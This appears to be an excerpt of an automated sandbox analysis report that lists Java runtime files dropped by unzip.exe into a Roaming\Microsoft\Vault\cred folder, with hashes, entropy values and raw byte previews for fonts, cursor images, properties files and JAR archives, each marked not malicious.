SSDEEP:	6144:R5OO1ZjNDE7/MsTJ30otegK4zJwz3UhG5jXsrg2HLzYv7cf0R7o7+WX/ov2DG:bOO11CEo9xzJwljXsrhHQ7cMuX/16
MD5:	5DD099908B722236AA0C0047C56E5AF2
SHA1:	92B79FEFC35E96190250C602A8FED85276B32A95
SHA-256:	53773357D739F89BC10087AB2A829BA057649784A9ACBFFEE18A488B2DCCB9EE
SHA-512:	440534EB2076004BEA66CF9AC2CE2B37C10FBF5CC5E0DD8B8A8EDEA25E3613CE8A59FFCB2500F60528BBF871FF37F1D0A3C60396BC740CCDB4324177C38BE97A
Malicious:	false
Preview:	...........pLTSH_R.a........OS/2...........Vcmapz.$L.......Zcvt ...y...8...hfpgm..1.........glyf......\....hdmx..0A.......hhead..&..:H...6hhea......:....$hmtx.,Z:..:.....loca.~'...T.....maxp......n.... name..=%..n....Kpost$.#...s$..[?prep......d...a..........................................)........2'............'........ ....................".".............0.%...............%...........)....................... ......0 ..............................) ) ) ) ...........................................2.2.2.2.).......................................................'"'"'"1....0.........................................................................................................'.....'...........)..,...&,....#............./&.....&.&.$.....$...$........'....... ....)...."...,.......+.....'....).,.....-)..)................... ..."..................,.........(.........,........................../..2.......+.........,.#) .....................+..).........0......+...............,.,.,......

C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\jre\jre-1.8\lib\fonts\LucidaSansRegular.ttf

Download File

Process:	C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\unzip.exe
File Type:	TrueType Font data, 18 tables, 1st "GDEF", 19 names, Macintosh, Copyright (c) 1999 by Bigelow & Holmes Inc. Pat. Des. 289,420.Lucida SansRegularLucida Sans Regu
Category:	dropped
Size (bytes):	698236
Entropy (8bit):	6.892888039120645
Encrypted:	false
SSDEEP:	12288:6obn11t7t7DxT+3+OQ64cctiOAq12ZX/DmfT6R83Sd8uvx7wSnyER4ky+SH/KPKQ:6oTJZzHniOAZ783Sd8uvx7wSnyER4kyI
MD5:	B75309B925371B38997DF1B25C1EA508
SHA1:	39CC8BCB8D4A71D4657FC92EF0B9F4E3E9E67ADD
SHA-256:	F8D877B0B64600E736DFE436753E8E11ACB022E59B5D7723D7D221D81DC2FCDE
SHA-512:	9C792EF3116833C90103F27CFD26A175AB1EB11286959F77062893A2E15DE44D79B27E5C47694CBBA734CC05A9A5BEFA72E991C7D60EAB1495AAC14C5CAD901D
Malicious:	false
Preview:	........... GDEF..\|.......GPOS.......L...HGSUB.f.........LTSH...........uOS/2.#GQ...,...Vcmap..4........4cvt .y..........fpgm.!&.........glyf. ..........hdmx...M...(...\head..........6hhea...........$hmtx.S........-.loca'.c......-.maxp...Y....... nameW..r........post.&-.........prep.........................).......).....d. ...................{........B&H..@. ...D.]......`................................................................................................ !"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`a.bcdefghijklmnopqrstuvwxyz{\|}~..........................................................................................................".....".~...............E.u.z.~.......................O.\...............................:.R.m.............9.M.T.p.:.[.... . F p . . .!8!.!.".#.#.#!$i%.%.%.%.%.%.%.%$%,%4%<%l%.%.%.%.%.%.%.%.%.%.%.%.%.%.%.%.&.&.&.&.&<&@&B&`&c&f&k'.'.'''K'M'R'V'^'g'.'.'................ .3.....6.<.>.A.D.N.b.r.t......... .........P.......t.z.~

C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\jre\jre-1.8\lib\fonts\LucidaTypewriterBold.ttf

Download File

Process:	C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\unzip.exe
File Type:	TrueType Font data, 13 tables, 1st "OS/2", 16 names, Macintosh, Copyright (c) 1999, 2001 by Bigelow & Holmes Inc.Lucida Sans TypewriterBoldLucida Sans Typewrite
Category:	dropped
Size (bytes):	234068
Entropy (8bit):	6.901545053424004
Encrypted:	false
SSDEEP:	6144:3BPS7w5KIMtYwqcO3GbA4MJcs2ME9UGQ2n9gM/oD:xVMtgcGGPMJcs4b9gM/4
MD5:	A0C96AA334F1AEAA799773DB3E6CBA9C
SHA1:	A5DA2EB49448F461470387C939F0E69119310E0B
SHA-256:	FC908259013B90F1CBC597A510C6DD7855BF9E7830ABE3FC3612AB4092EDCDE2
SHA-512:	A43CF773A42B4CEBF4170A6C94060EA2602D2D7FA7F6500F69758A20DC5CC3ED1793C7CEB9B44CE8640721CA919D2EF7F9568C5AF58BA6E3CF88EAE19A95E796
Malicious:	false
Preview:	...........POS/2..........VcmapW......4....cvt .M/.........fpgm..1.........glyf\|......@....head.c....L...6hhea...........$hmtx.e.........tloca..h..."....xmaxp......7.... name......7.....post1..%..;h..I.prep.......4... .............3.......3...1.f................+...x.........B&H.. . ...D.]......`................................................................................................ !"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`a....................................................................................................................................x...........~...............u.z.~.......................O.\...............................:.R.m...........:.[.... . . . " & 0 3 : < > D . . . . .!.!.!.!"!&!.!^!.!.".".".".".".".")"+"H"a"e#.#.#!%.%.%.%.%.%.%.%$%,%4%<%l%.%.%.%.%.%.%.%.%.%.%.%.%.%.%.&<&@&B&`&c&f&k...................3...b.r.t....... ...............t.z.~.........................Q.^.............................!.@.`.p...........?.... . . . &

C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\jre\jre-1.8\lib\fonts\LucidaTypewriterRegular.ttf

Download File

Process:	C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\unzip.exe
File Type:	TrueType Font data, 13 tables, 1st "OS/2", 16 names, Macintosh, Copyright (c) 1999 by Bigelow & Holmes Inc.Lucida Sans TypewriterRegularLucida Sans Typewriter R
Category:	dropped
Size (bytes):	242700
Entropy (8bit):	6.936925430880877
Encrypted:	false
SSDEEP:	3072:VwzZsJcCrn271g+UGFDUnrrHqMyBtlc3+fzx5R1zeqZdDgfSkecUfEDpEXzSyPMx:GWcCrn2C46Ak+naqaucYEDpEX3gZoO9
MD5:	C1397E8D6E6ABCD727C71FCA2132E218
SHA1:	C144DCAFE4FAF2E79CFD74D8134A631F30234DB1
SHA-256:	D9D0AAB0354C3856DF81AFAC49BDC586E930A77428CB499007DDE99ED31152FF
SHA-512:	DA70826793C7023E61F272D37E2CC2983449F26926746605C550E9D614ACBF618F73D03D0C6351B9537703B05007CD822E42E6DC74423CB5CC736B31458D33B1
Malicious:	false
Preview:	...........POS/2...s.......`cmap..Rh...<....cvt m......@...<fpgm..1....\|....glyf..;}...8....head.,j..2L...6hhea......2....$hmtx.....2.....loca.PB...H(....maxp.z....].... namex.R...].....post...Q..ax..I.prep.UJ....\.................).......).....d. ..............{.............B&H..@. ...D.\...... ........=..... ......................................................................................... !"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`a.bcdefghijklmnopqrstuvwxyz{\|}~..................................................................................................................~...............u.z.~.......................O.\...............................:.R.m...........:.[.... . . . " & 0 3 : < > D . . . .!.!.!.!"!&!.!^!.!.".".".".".".".")"+"H"a"e#.#.#!%.%.%.%.%.%.%.%$%,%4%<%l%.%.%.%.%.%.%.%.%.%.%.%.%.%.%.&<&@&B&`&c&f&k.........................3...b.r.t....... ...............t.z.~.........................Q.^.............................!.@.`.p...........?..

C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\jre\jre-1.8\lib\hijrah-config-umalqura.properties

Download File

Process:	C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\unzip.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	13962
Entropy (8bit):	3.4283479014478493
Encrypted:	false
SSDEEP:	96:RgZass+YXdGOS8NhN9Yd9Yq67IwOYUuUS9O0:RyJO/BFi9YqAInYUuUmO0
MD5:	1EDDFB1EE252055556F40CDC79632E98
SHA1:	84AA425100740722E91F4725CAF849E7863D12BA
SHA-256:	69BECFE0D45B62BBDBCF6FE111A8A3A041FB749B6CF38E8A2F670607E17C9EE2
SHA-512:	A0FDBF42FF105C9A2F12179124606A720DF8F32365605644E15600767E5732312777A58390FDB1A9B1C0B152CCC29496133B278A6E5736B38AF2B5FAB251D40C
Malicious:	false
Preview:	# Copyright (c) 2013, Oracle and/or its affiliates. All rights reserved..# ORACLE PROPRIETARY/CONFIDENTIAL. Use is subject to license terms..#.#.#.#.#.#.#.#.#.#.#.#.#.#.#.#.#.#.#.#.#.# This properties file defines a Hijrah calendar variant..#.# Fields:.#.# <version> ::= 'version' '=' <version string>.# <id> ::= 'id' '=' <id string>.# <type> ::= 'type' '=' <type string>.# <iso-start> ::= 'iso-start' '=' <start date in the ISO calendar>.# <year> ::= <yyyy> '=' <nn nn nn nn nn nn nn nn nn nn nn nn>.#.# version ... (Required).#.# id ... (Required).# Identifies the Java Chronology.#.# type ... (Required).# Identifies the type of calendar in the standard calendar ID scheme.# iso-start ... (Required).# Specifies the corresponding ISO date to the first Hijrah day.# in the defined range of dates.#.# year ... (Required).# Number of days for each month of a Hijrah year.# * Each line defines a year. The years must be in chronological.#

C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\jre\jre-1.8\lib\i386\jvm.cfg

Download File

Process:	C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\unzip.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	623
Entropy (8bit):	4.956046853743128
Encrypted:	false
SSDEEP:	12:QcwmIzDhHlB725iwoXH3ExOvadDfI3xizh49g1n8OEDfI7yO7:QhDBfOoXHjifIBMB1XqfI77
MD5:	9AEF14A90600CD453C4E472BA83C441F
SHA1:	10C53C9FE9970D41A84CB45C883EA6C386482199
SHA-256:	9E86B24FF2B19D814BBAEDD92DF9F0E1AE86BF11A86A92989C9F91F959B736E1
SHA-512:	481562547BF9E37D270D9A2881AC9C86FC8F928B5C176E9BAF6B8F7B72FB9827C84EF0C84B60894656A6E82DD141779B8D283C6E7A0E85D2829EA071C6DB7D14
Malicious:	false
Preview:	# Copyright (c) 2001, 2013, Oracle and/or its affiliates. All rights reserved..# ORACLE PROPRIETARY/CONFIDENTIAL. Use is subject to license terms..#.#.#.#.#.#.#.#.#.#.#.#.#.#.#.#.#.#.#.#.#.# List of JVMs that can be used as an option to java, javac, etc..# Order is important -- first in this list is the default JVM..# NOTE that this both this file and its format are UNSUPPORTED and.# WILL GO AWAY in a future release..#.# You may also select a JVM in an arbitrary location with the.# "-XXaltjvm=<jvm_dir>" option, but that too is unsupported.# and may not be available in a future release..#.-client KNOWN.-server KNOWN.

C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\jre\jre-1.8\lib\images\cursors\cursors.properties

Download File

Process:	C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\unzip.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	1280
Entropy (8bit):	4.9763389414972465
Encrypted:	false
SSDEEP:	24:RlwQtG0Bf29d3ptAMZGpfFGZWpHN07mBpQKf4TpxV4jp504Tz8pFMafpXs:RlwQM0BfEpZSKyCycXW44Cfy
MD5:	269D03935907969C3F11D43FEF252EF1
SHA1:	713ACB9EFF5F0B14A109E6C2771F62EAC9B57D7C
SHA-256:	7B8B63F78E2F732BD58BF8F16144C4802C513A52970C18DC0BDB789DD04078E4
SHA-512:	94D8EE79847CD07681645D379FEEF6A4005F1836AC00453FB685422D58113F641E60053F611802B0FF8F595B2186B824675A91BF3E68D336EF5BD72FAFB2DCC5
Malicious:	false
Preview:	#.#.# Cursors Properties file.#.# Names GIF89 sources for Custom Cursors and their associated HotSpots.#.# Note: the syntax of the property name is significant and is parsed.# by java.awt.Cursor.#.# The syntax is: Cursor.<name>.<geom>.File=win32_<filename>.# Cursor.<name>.<geom>.HotSpot=<x>,<y>.#. Cursor.<name>.<geom>.Name=<localized name>.#.Cursor.CopyDrop.32x32.File=win32_CopyDrop32x32.gif.Cursor.CopyDrop.32x32.HotSpot=0,0.Cursor.CopyDrop.32x32.Name=CopyDrop32x32.#.Cursor.MoveDrop.32x32.File=win32_MoveDrop32x32.gif.Cursor.MoveDrop.32x32.HotSpot=0,0.Cursor.MoveDrop.32x32.Name=MoveDrop32x32.#.Cursor.LinkDrop.32x32.File=win32_LinkDrop32x32.gif.Cursor.LinkDrop.32x32.HotSpot=0,0.Cursor.LinkDrop.32x32.Name=LinkDrop32x32.#.Cursor.CopyNoDrop.32x32.File=win32_CopyNoDrop32x32.gif.Cursor.CopyNoDrop.32x32.HotSpot=6,2.Cursor.CopyNoDrop.32x32.Name=CopyNoDrop32x32.#.Cursor.MoveNoDrop.32x32.File=win32_MoveNoDrop32x32.gif.Cursor.MoveNoDrop.32x32.HotSpot=6,2.Cursor.MoveNoDrop.32

C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\jre\jre-1.8\lib\images\cursors\invalid32x32.gif

Download File

Process:	C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\unzip.exe
File Type:	GIF image data, version 89a, 32 x 32
Category:	dropped
Size (bytes):	153
Entropy (8bit):	6.2813106319833665
Encrypted:	false
SSDEEP:	3:Csl7X/7/xlXlLaFGkDPF4V0Pee1F/sjtH5ybOCb1C3sxlWn:NljDjkFHF4V0Peene15tutsn
MD5:	1E9D8F133A442DA6B0C74D49BC84A341
SHA1:	259EDC45B4569427E8319895A444F4295D54348F
SHA-256:	1A1D3079D49583837662B84E11D8C0870698511D9110E710EB8E7EB20DF7AE3B
SHA-512:	63D6F70C8CAB9735F0F857F5BF99E319F6AE98238DC7829DD706B7D6855C70BE206E32E3E55DF884402483CF8BEBAD00D139283AF5C0B85DC1C5BF8F253ACD37
Malicious:	false
Preview:	GIF89a . ................!.......,.... . ...j.?...o..T....._]-..9.`..D...f........^...n.`.%C......<..E..S&QL.....n+...R....'\|N...."U........(8HXhx.X..;

C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\jre\jre-1.8\lib\images\cursors\win32_CopyDrop32x32.gif

Download File

Process:	C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\unzip.exe
File Type:	GIF image data, version 89a, 31 x 32
Category:	dropped
Size (bytes):	165
Entropy (8bit):	6.347455736310776
Encrypted:	false
SSDEEP:	3:CruuU/XExlHrBwM7Qt/wCvTjh2Azr8ptBNKtWwUzJ7Ful5u44JyYChWn:KP0URwMcx3UAzADBNwUlBul5TLYMWn
MD5:	89CDF623E11AAF0407328FD3ADA32C07
SHA1:	AE813939F9A52E7B59927F531CE8757636FF8082
SHA-256:	13C783ACD580DF27207DABCCB10B3F0C14674560A23943AC7233DF7F72D4E49D
SHA-512:	2A35311D7DB5466697D7284DE75BABEE9BD0F0E2B20543332FCB6813F06DEBF2457A9C0CF569449C37F371BFEB0D81FB0D219E82B9A77ACC6BAFA07499EAC2F7
Malicious:	false
Preview:	GIF89a.. ................!.......,...... ...vL...-....F....o.U.8J..'J.....3...a...."...")..=fPHS......h.Zc.KDj........k.-mF.. V..9'......f.T....w.xW.B.....P..;

C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\jre\jre-1.8\lib\images\cursors\win32_CopyNoDrop32x32.gif

Download File

Process:	C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\unzip.exe
File Type:	GIF image data, version 89a, 32 x 32
Category:	dropped
Size (bytes):	153
Entropy (8bit):	6.2813106319833665
Encrypted:	false
SSDEEP:	3:Csl7X/7/xlXlLaFGkDPF4V0Pee1F/sjtH5ybOCb1C3sxlWn:NljDjkFHF4V0Peene15tutsn
MD5:	1E9D8F133A442DA6B0C74D49BC84A341
SHA1:	259EDC45B4569427E8319895A444F4295D54348F
SHA-256:	1A1D3079D49583837662B84E11D8C0870698511D9110E710EB8E7EB20DF7AE3B
SHA-512:	63D6F70C8CAB9735F0F857F5BF99E319F6AE98238DC7829DD706B7D6855C70BE206E32E3E55DF884402483CF8BEBAD00D139283AF5C0B85DC1C5BF8F253ACD37
Malicious:	false
Preview:	GIF89a . ................!.......,.... . ...j.?...o..T....._]-..9.`..D...f........^...n.`.%C......<..E..S&QL.....n+...R....'\|N...."U........(8HXhx.X..;

C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\jre\jre-1.8\lib\images\cursors\win32_LinkDrop32x32.gif

Download File

Process:	C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\unzip.exe
File Type:	GIF image data, version 89a, 31 x 32
Category:	dropped
Size (bytes):	168
Entropy (8bit):	6.465243369905675
Encrypted:	false
SSDEEP:	3:CruuU/XExlHrZauowM7Qt/wCvTjh2Azr8ptBNKtWwUzJZmQYRNbC1MIQvEn:KP0UpawMcx3UAzADBNwUlZaCzn
MD5:	694A59EFDE0648F49FA448A46C4D8948
SHA1:	4B3843CBD4F112A90D112A37957684C843D68E83
SHA-256:	485CBE5C5144CFCD13CC6D701CDAB96E4A6F8660CBC70A0A58F1B7916BE64198
SHA-512:	CF2DFD500AF64B63CC080151BC5B9DE59EDB99F0E31676056CF1AFBC9D6E2E5AF18DC40E393E043BBBBCB26F42D425AF71CCE6D283E838E67E61D826ED6ECD27
Malicious:	false
Preview:	GIF89a.. ................!.......,...... ...yL...-....F....o.U.8J..'J.....3...a...."...")..=fPHS......h.Zc.KDj........k.-mF.6.'.....`1]......u.Q.r.V..C......f.P..;

C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\jre\jre-1.8\lib\images\cursors\win32_LinkNoDrop32x32.gif

Download File

Process:	C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\unzip.exe
File Type:	GIF image data, version 89a, 32 x 32
Category:	dropped
Size (bytes):	153
Entropy (8bit):	6.2813106319833665
Encrypted:	false
SSDEEP:	3:Csl7X/7/xlXlLaFGkDPF4V0Pee1F/sjtH5ybOCb1C3sxlWn:NljDjkFHF4V0Peene15tutsn
MD5:	1E9D8F133A442DA6B0C74D49BC84A341
SHA1:	259EDC45B4569427E8319895A444F4295D54348F
SHA-256:	1A1D3079D49583837662B84E11D8C0870698511D9110E710EB8E7EB20DF7AE3B
SHA-512:	63D6F70C8CAB9735F0F857F5BF99E319F6AE98238DC7829DD706B7D6855C70BE206E32E3E55DF884402483CF8BEBAD00D139283AF5C0B85DC1C5BF8F253ACD37
Malicious:	false
Preview:	GIF89a . ................!.......,.... . ...j.?...o..T....._]-..9.`..D...f........^...n.`.%C......<..E..S&QL.....n+...R....'\|N...."U........(8HXhx.X..;

C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\jre\jre-1.8\lib\images\cursors\win32_MoveDrop32x32.gif

Download File

Process:	C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\unzip.exe
File Type:	GIF image data, version 89a, 31 x 32
Category:	dropped
Size (bytes):	147
Entropy (8bit):	6.147949937659802
Encrypted:	false
SSDEEP:	3:CruuU/XExlHrSauZKwM7Qt/wCvTjh2Azr8ptBNKtWXOh6WoXt2W:KP0UvEKwMcx3UAzADBNXOh6h9p
MD5:	CC8DD9AB7DDF6EFA2F3B8BCFA31115C0
SHA1:	1333F489AC0506D7DC98656A515FEEB6E87E27F9
SHA-256:	12CFCE05229DBA939CE13375D65CA7D303CE87851AE15539C02F11D1DC824338
SHA-512:	9857B329ACD0DB45EA8C16E945B4CFA6DF9445A1EF457E4B8B40740720E8C658301FC3AB8BDD242B7697A65AE1436FD444F1968BD29DA6A89725CDDE1DE387B8
Malicious:	false
Preview:	GIF89a.. ................!.......,...... ...dL...-....F....o.U.8J..'J.....3...a...."...")..=fPHS......h.Zc.KDj.....-.kj..m.....X,&.......S..;

C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\jre\jre-1.8\lib\images\cursors\win32_MoveNoDrop32x32.gif

Download File

Process:	C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\unzip.exe
File Type:	GIF image data, version 89a, 32 x 32
Category:	dropped
Size (bytes):	153
Entropy (8bit):	6.2813106319833665
Encrypted:	false
SSDEEP:	3:Csl7X/7/xlXlLaFGkDPF4V0Pee1F/sjtH5ybOCb1C3sxlWn:NljDjkFHF4V0Peene15tutsn
MD5:	1E9D8F133A442DA6B0C74D49BC84A341
SHA1:	259EDC45B4569427E8319895A444F4295D54348F
SHA-256:	1A1D3079D49583837662B84E11D8C0870698511D9110E710EB8E7EB20DF7AE3B
SHA-512:	63D6F70C8CAB9735F0F857F5BF99E319F6AE98238DC7829DD706B7D6855C70BE206E32E3E55DF884402483CF8BEBAD00D139283AF5C0B85DC1C5BF8F253ACD37
Malicious:	false
Preview:	GIF89a . ................!.......,.... . ...j.?...o..T....._]-..9.`..D...f........^...n.`.%C......<..E..S&QL.....n+...R....'\|N...."U........(8HXhx.X..;

C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\jre\jre-1.8\lib\javafx.properties

Download File

Process:	C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\unzip.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	56
Entropy (8bit):	4.46299398428717
Encrypted:	false
SSDEEP:	3:CEBqRM9LTAGQdLVM2P5qRM9LHQIuHMv:CEAsnAbL22PYszQw
MD5:	881F40EA717419D1AE84436E882F8683
SHA1:	3DF2E6F87E323986E1A97DA00B65460A8E964012
SHA-256:	BCCD096FD787E6CC7553A2CF78956735007B3090F4BEDE6FA72CF05646A07A86
SHA-512:	DD65A91016BA52D1B2CE814DF735B8E7BC8479CA4FF26B5272B8ECF192396BC5FBFDE108B16A83D912BD3F020FAA006D9164DCE8CD689518F316BFBEFDB13DFA
Malicious:	false
Preview:	javafx.runtime.version=8.0.431.javafx.runtime.build=b10.

C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\jre\jre-1.8\lib\javaws.jar

Download File

Process:	C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\unzip.exe
File Type:	Java archive data (JAR)
Category:	dropped
Size (bytes):	956923
Entropy (8bit):	5.936133638164419
Encrypted:	false
SSDEEP:	6144:2F+VeaiwB2KqryAv8wyBkEQZ+49s2yb+Fn27IrZVb5o/BllxK8hEXbuBiCDvPXGQ:1ezrybBx72sZ+FQNV
MD5:	F630BF4FDF74E39CA988D9FD499CFB61
SHA1:	C3E191E9D2692A5A17617F7BB4809D8420EAF5E2
SHA-256:	ADC0FEA32F003298AC7F0CBD6657DFCAC7AA62714464A79986EDBC8042DA64DB
SHA-512:	3C04D31A6B81FE79D474ECD221255E9967B2F6D2C03F4E277E14B011706722C0C5227B8679FC456F9B2C2585925D36093647B92CAB58C7342F34E5A160CA7E90
Malicious:	false
Preview:	PK........qB>Y................META-INF/....PK........pB>YF.Wi...i.......META-INF/MANIFEST.MFManifest-Version: 1.0..Ant-Version: Apache Ant 1.10.6..Created-By: 1.8.0_431-b10 (Oracle Corporation)....PK........pB>Y................com/PK........pB>Y................com/sun/PK........qB>Y................com/sun/javaws/PK........qB>Y................com/sun/javaws/exceptions/PK........qB>Y................com/sun/javaws/jnl/PK........qB>Y................com/sun/javaws/net/PK........qB>Y................com/sun/javaws/net/protocol/PK........qB>Y............ ...com/sun/javaws/net/protocol/jar/PK........qB>Y................com/sun/javaws/progress/PK........qB>Y................com/sun/javaws/security/PK........qB>Y................com/sun/javaws/ui/PK........qB>Y................com/sun/javaws/util/PK........qB>Y................com/sun/jnlp/PK........pB>Y................javax/PK........qB>Y................javax/jnlp/PK........pB>Y.T..........#...com/sun/javaws/BrowserSupport.class.......1.&...()V...(

C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\jre\jre-1.8\lib\jce.jar

Download File

Process:	C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\unzip.exe
File Type:	Zip archive data, at least v2.0 to extract, compression method=deflate
Category:	dropped
Size (bytes):	123022
Entropy (8bit):	7.921965490818777
Encrypted:	false
SSDEEP:	3072:wOOZiSfH3HdVuZMyGXd+XqEl2gWCaqkVQKg:WH3HdVBX+qpK++
MD5:	724AD86533A54FCFD37A3B296F565C4C
SHA1:	72EA2FAA6B5C8B5F7B7B418D83E08F78EF6F0B66
SHA-256:	328A1EFDA438C5DD549FCA7795D48DC4F4428E307C7157D1920853F376A05045
SHA-512:	4AE28077CFBABFF8A406EBC0E5AC58F8356469836F8FCA9984A8035ADCF0EEC6900A436FF6723D73B7A79670F8ED0F806C6C1795145767EC86C3FA09F24F8D88
Malicious:	false
Preview:	PK........-.>Y................META-INF/MANIFEST.MF.Y..X..;...A.....}F.. $....T.. Z.....Yy+mto....:k...d..x..:q?.m......O\|}..:nF..>.j.c...E.g..15c^._.f......O.9....O..>.2.q.'y...M....Q{?../L.....W.8.._.../a[.6L...{k.V.c....J...c.?...7........b...[.......c.......n\|..HB_..g...gg.rw.._{....C....l..M.i}>o....7I.[X..As..#.}=......}.....z..PJC.pT....3V-.!O4.\|.%...A.N....4.g..a\|.f..&'.....-T..._.Nvh.:;..q..O/XY.e4~.......q.. s\.E..pce]....'..ni...MU..;..I'va.....?..o.o..:...[..C..VO..]V-....`'....v..d..........p..~.`..(..\|......u....{..R.m.3.H....O.k.~$Rh>....P...=....~x...c...g.]?...c...(.....N..3CZ<..g__.y..0..1!...!.q:....x<8#\q^NC.r'....w9l................v&.@..`..Rh.J..S<.u........'.....z/......3...&.\_.....k.R`..,..%.woN.%n>.O3...N.c\...x....p.Py..TV..(9F...my...p..q..f.h....U.Z.\|.{0...6K.9..V....j[Q.b.D..y.<j.2..v.W.....].f....F$q2.!W...4.~.GH1..).a=..Cb..Ec.>...q....=......P'.5..A...P&2...V.s..e..%.....Qb.i!..?,....8d.5....P.]..vq..@JDCBQq...W

C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\jre\jre-1.8\lib\jfr.jar

Download File

Process:	C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\unzip.exe
File Type:	Java archive data (JAR)
Category:	dropped
Size (bytes):	579834
Entropy (8bit):	5.780354613484367
Encrypted:	false
SSDEEP:	12288:J5l+qU67FYWg+YWgYWeoXqgYSqYQh2f/m5NwaHkSIJHvWQ6Q7ooMcgH5lY7TQ5cw:J5l+qU67FYWg+YWgYWeoXqgYSqYQh2fk
MD5:	92D428107476A27815086E631DADF585
SHA1:	E99313C590C515BF8476F37050A410253354FE39
SHA-256:	B7702C77A875D530091AC4C9E8E48FBE70778B70A5C74D6DFC078C18BFC43A25
SHA-512:	CC48BDC0314028F99198EB5C3CA6D23EBAE027D10144BA6C53B050DF38FB544F8739706E2A4C13A7F8ABCDD5E84977ADF2E075307A7FC1E96C113AA5AD50DB43
Malicious:	false
Preview:	PK........HB>Y................META-INF/....PK........HB>Y\.d.?...?.......META-INF/MANIFEST.MFManifest-Version: 1.0..Implementation-Vendor: Oracle Corporation..Implementation-Title: Java Runtime Environment..Implementation-Version: 1.8.0_431..Specification-Vendor: Oracle Corporation..Created-By: 1.7.0_291 (Oracle Corporation)..Specification-Title: Java Platform API Specification..Specification-Version: 1.8....PK.........A>YB.<>^...^...8...com/oracle/jrockit/jfr/client/EventSettingsBuilder.class.......4....5.f..g....f..4.h..4.i..j....f..4.k..l....m..4.n..o....f..4.p..q..r....f....s....t....u....v..w..x..y....z..{....\|....}....~.................................#.........................)...................................................eventDefaultSets...Ljava/util/ArrayList;...Signature..DLjava/util/ArrayList<Loracle/jrockit/jfr/settings/EventDefaultSet;>;...settings..ALjava/util/ArrayList<Loracle/jrockit/jfr/settings/EventSetting;>;...eventDescriptorType..2Loracle/jrockit/jfr/openmbean

C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\jre\jre-1.8\lib\jfr\default.jfc

Download File

Process:	C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\unzip.exe
File Type:	XML 1.0 document, ASCII text
Category:	dropped
Size (bytes):	21146
Entropy (8bit):	4.567336298987928
Encrypted:	false
SSDEEP:	192:/JA1ySPBhRt0ng3Ca66LAsmztuxqCbCdCsCNG2ixzTJDZi5OAdzAMzVdWVqGKxtx:/J4yS5zaaedc2Fchp
MD5:	C331017BB084D523FCD0746FC7260E04
SHA1:	70D06F48A092DA27A00FBF991E846525033CFC0C
SHA-256:	0B64A76A9C02A34B70B000212AC6B44F2BB52AB632925304AAE3798866C1A061
SHA-512:	15D16DE600C6C984CBB49B53AF1325AF2256F4049DF7654903B85BEE453C1AC48959B99804096FAA797F528A0AE88D84A9CA566E1F01A6FC2B37BA4508F12D4C
Malicious:	false
Preview:	<?xml version="1.0" encoding="UTF-8"?>.. . Recommended way to edit .jfc files is to use Java Mission Control,. see Window -> Flight Recorder Template Manager..-->..<configuration version="1.0" name="Continuous" description="Low overhead configuration safe for continuous use in production environments, typically less than 1 % overhead." provider="Oracle">.. <producer uri="http://www.oracle.com/hotspot/jvm/" label="Oracle JDK">.. <control>.. . Contents of the control element is not read by the JVM, it's used. by Java Mission Control to change settings that carry the control attribute.. -->.. <selection name="gc-level" default="detailed" label="Garbage Collector">. <option label="Off" name="off">off</option>. <option label="Normal" name="detailed">normal</option>. <option label="All" name="all">all</option>. </selection>.. <condition name="gc-enabled-normal" true="true" false="false">. <or>.

C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\jre\jre-1.8\lib\jfr\profile.jfc

Download File

Process:	C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\unzip.exe
File Type:	XML 1.0 document, ASCII text
Category:	dropped
Size (bytes):	21102
Entropy (8bit):	4.56701710108319
Encrypted:	false
SSDEEP:	192:/fA1ypPOdhJt0ng3Ca66L0smztuxqHbHdHsHNG2iYzTJDZ95OAdzAMzVdWVqGKxX:/f4ypy3aamd79Mrhl
MD5:	06633DDAFD755D3D717457D075A871AF
SHA1:	28B699E20B33C8F64F7E17D651ED9B21BA99E71D
SHA-256:	4988A160E416D96F00DADF04F0CAEA35F7B19FDCA8B68A8BE914F3C5AAF2E46F
SHA-512:	7D12F2F9602D412C589CD79253B7230F872E6C20309FB6B3C1B83DCAB2FEF30D902D93C8E52AA16263F5356103073A43DCFBE2D449BE2387CB06ED3578FBBCE5
Malicious:	false
